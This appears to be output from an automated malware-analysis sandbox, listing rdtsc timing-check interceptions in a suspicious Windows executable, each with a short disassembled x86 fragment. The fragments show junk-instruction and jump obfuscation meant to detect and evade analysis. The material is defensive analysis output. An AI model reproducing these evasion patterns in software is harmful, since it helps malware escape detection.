Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70100BB second address: 70101A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FEEDCB1F6E7h 0x0000000a pushfd 0x0000000b jmp 00007FEEDCB1F6E8h 0x00000010 and eax, 715F0318h 0x00000016 jmp 00007FEEDCB1F6DBh 0x0000001b popfd 0x0000001c pop ecx 0x0000001d popad 0x0000001e push edx 0x0000001f jmp 00007FEEDCB1F6E4h 0x00000024 mov dword ptr [esp], ebx 0x00000027 pushad 0x00000028 call 00007FEEDCB1F6DEh 0x0000002d pushfd 0x0000002e jmp 00007FEEDCB1F6E2h 0x00000033 and eax, 12D987D8h 0x00000039 jmp 00007FEEDCB1F6DBh 0x0000003e popfd 0x0000003f pop esi 0x00000040 pushfd 0x00000041 jmp 00007FEEDCB1F6E9h 0x00000046 adc ecx, 0CD4FF76h 0x0000004c jmp 00007FEEDCB1F6E1h 0x00000051 popfd 0x00000052 popad 0x00000053 mov ebx, dword ptr [eax+10h] 0x00000056 jmp 00007FEEDCB1F6DEh 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d movzx ecx, bx 0x00000060 movsx edx, cx 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101A5 second address: 70101AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101AB second address: 70101B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B1 second address: 70101B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B5 second address: 70101B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B9 second address: 70101CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101CE second address: 7010209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f jmp 00007FEEDCB1F6E6h 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEEDCB1F6DAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010209 second address: 701020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701020D second address: 7010213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010213 second address: 7010231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEEDCB30137h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010231 second address: 7010237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010237 second address: 701023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701032B second address: 701032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701032F second address: 7010335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701041D second address: 701047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEDCB1F6E5h 0x00000009 add ecx, 62F68AE6h 0x0000000f jmp 00007FEEDCB1F6E1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB1F6E0h 0x0000001b add cx, E688h 0x00000020 jmp 00007FEEDCB1F6DBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov dword ptr [esi+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701047C second address: 7010482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010482 second address: 70104A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FEEDCB1F6DDh 0x00000014 push ecx 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70104A6 second address: 7010502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB2F2ECh 0x00000013 adc ch, 00000078h 0x00000016 jmp 00007FEEDCB2F2EBh 0x0000001b popfd 0x0000001c mov ah, 09h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+4Ch] 0x00000022 jmp 00007FEEDCB2F2EBh 0x00000027 mov dword ptr [esi+10h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEEDCB2F2F5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010502 second address: 7010508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010508 second address: 7010567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007FEEDCB2F2EFh 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 pushad 0x00000014 mov ebx, ecx 0x00000016 pushad 0x00000017 mov ax, 59BDh 0x0000001b mov esi, 742ED4B9h 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+54h] 0x00000025 jmp 00007FEEDCB2F2F4h 0x0000002a mov dword ptr [esi+18h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FEEDCB2F2F7h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010567 second address: 701057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701057F second address: 70105C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f mov cl, 4Dh 0x00000011 popad 0x00000012 mov dword ptr [esi+1Ch], eax 0x00000015 jmp 00007FEEDCB2F2F1h 0x0000001a mov eax, dword ptr [ebx+5Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FEEDCB2F2F3h 0x00000025 mov ecx, 333DA7DFh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105C4 second address: 70105D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105D8 second address: 70105DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105DC second address: 7010652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c mov dh, cl 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+60h] 0x00000012 pushad 0x00000013 push edx 0x00000014 mov di, ax 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007FEEDCB1F6E9h 0x0000001e sbb cl, 00000016h 0x00000021 jmp 00007FEEDCB1F6E1h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+24h], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEEDCB1F6DCh 0x00000032 or cx, 1E38h 0x00000037 jmp 00007FEEDCB1F6DBh 0x0000003c popfd 0x0000003d mov ch, CCh 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+64h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010652 second address: 7010656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010656 second address: 701065A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701065A second address: 7010660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010660 second address: 7010666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010666 second address: 701066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701066A second address: 70106A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FEEDCB1F6E6h 0x00000014 xor ax, C2F8h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106A3 second address: 70106B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106B7 second address: 70106BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106BB second address: 701073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b jmp 00007FEEDCB2F2F7h 0x00000010 mov dword ptr [esi+2Ch], eax 0x00000013 pushad 0x00000014 mov cl, 3Ah 0x00000016 pushfd 0x00000017 jmp 00007FEEDCB2F2F1h 0x0000001c or esi, 382FA3A6h 0x00000022 jmp 00007FEEDCB2F2F1h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ax, word ptr [ebx+6Ch] 0x0000002d jmp 00007FEEDCB2F2EEh 0x00000032 mov word ptr [esi+30h], ax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FEEDCB2F2F7h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701073D second address: 7010743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010743 second address: 701076C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FEEDCB2F2EBh 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701076C second address: 7010771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010771 second address: 7010776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010776 second address: 7010791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov word ptr [esi+32h], ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, 799Bh 0x00000015 mov esi, 3BED1477h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010791 second address: 70107E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f pushad 0x00000010 jmp 00007FEEDCB2F2ECh 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB2F2F2h 0x0000001b xor esi, 5FF32AC8h 0x00000021 jmp 00007FEEDCB2F2EBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70107E4 second address: 70107FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70107FF second address: 7010805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010805 second address: 7010809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010809 second address: 701080D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701080D second address: 7010843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007FEEDCB1F6E7h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FEEDCB1F6DBh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010843 second address: 7010875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEDCB2F2F0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEDCB2F2F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010875 second address: 70108BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5DEAh 0x00000007 pushfd 0x00000008 jmp 00007FEEDCB1F6DBh 0x0000000d or eax, 03199E8Eh 0x00000013 jmp 00007FEEDCB1F6E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+3Ch], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEEDCB1F6DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70108BD second address: 70108CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70108CD second address: 7010906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007FEEDCB1F6E4h 0x00000017 add esi, 477E3E98h 0x0000001d jmp 00007FEEDCB1F6DBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010906 second address: 70109AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007FEEDCB2F2EEh 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 jmp 00007FEEDCB2F2F0h 0x0000001c push 00000001h 0x0000001e jmp 00007FEEDCB2F2F0h 0x00000023 nop 0x00000024 jmp 00007FEEDCB2F2F0h 0x00000029 push eax 0x0000002a jmp 00007FEEDCB2F2EBh 0x0000002f nop 0x00000030 jmp 00007FEEDCB2F2F6h 0x00000035 lea eax, dword ptr [ebp-10h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FEEDCB2F2F7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109AC second address: 70109B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109B2 second address: 70109B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109B6 second address: 70109C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109C5 second address: 70109C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109C9 second address: 70109CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109CD second address: 70109D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A16 second address: 7010A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A2E second address: 7010A58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEDCB2F2F5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A58 second address: 7010AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEDCB1F6E7h 0x00000009 or cx, A7BEh 0x0000000e jmp 00007FEEDCB1F6E9h 0x00000013 popfd 0x00000014 mov ah, 71h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test edi, edi 0x0000001b jmp 00007FEEDCB1F6E3h 0x00000020 js 00007FEF4CCCE2EDh 0x00000026 jmp 00007FEEDCB1F6E6h 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEEDCB1F6E7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010AE4 second address: 7010B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 mov bl, 3Ch 0x00000015 popad 0x00000016 lea eax, dword ptr [ebx+78h] 0x00000019 jmp 00007FEEDCB2F2ECh 0x0000001e push 00000001h 0x00000020 jmp 00007FEEDCB2F2F0h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEEDCB2F2EAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B2A second address: 7010B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B39 second address: 7010B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B5D second address: 7010B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B63 second address: 7010BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1386h 0x00000007 pushfd 0x00000008 jmp 00007FEEDCB2F2F7h 0x0000000d xor eax, 134E8A0Eh 0x00000013 jmp 00007FEEDCB2F2F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BAC second address: 7010BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BB0 second address: 7010BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BC3 second address: 7010C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB1F6DCh 0x00000013 xor esi, 2BFE2E18h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f mov ecx, 232E51CFh 0x00000024 popad 0x00000025 nop 0x00000026 pushad 0x00000027 mov bh, ch 0x00000029 push edx 0x0000002a mov edx, ecx 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 movsx edi, cx 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FEEDCB1F6DBh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C54 second address: 7010C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C5A second address: 7010C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C67 second address: 7010CBE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEEDCB2F2EBh 0x00000008 sbb cx, A2FEh 0x0000000d jmp 00007FEEDCB2F2F9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b call 00007FEEDCB2F2F8h 0x00000020 mov ah, 76h 0x00000022 pop edx 0x00000023 pushad 0x00000024 mov si, AC79h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
